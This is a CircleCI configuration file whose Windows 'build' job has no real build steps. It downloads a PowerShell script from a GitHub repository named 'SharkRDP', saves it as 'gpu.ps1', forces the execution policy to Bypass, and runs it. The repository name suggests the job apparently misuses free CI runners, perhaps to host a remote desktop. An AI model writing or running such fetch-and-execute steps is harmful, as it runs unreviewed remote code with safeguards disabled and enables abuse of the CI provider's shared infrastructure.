version: 2.1

orbs:
  win: circleci/windows@2.2.0

jobs:
  build:
    executor:
      name: win/default
      size: medium

    steps:
      - run:
          name: 1
          shell: powershell.exe
          command: |
            Invoke-WebRequest "https://raw.githubusercontent.com/fqwe070/SharkRDP/main/sh" -OutFile "gpu.ps1"

      - run:
          name: Run Script
          shell: powershell.exe
          command: |
            Set-ExecutionPolicy Bypass -Scope Process -Force
            .\gpu.ps1
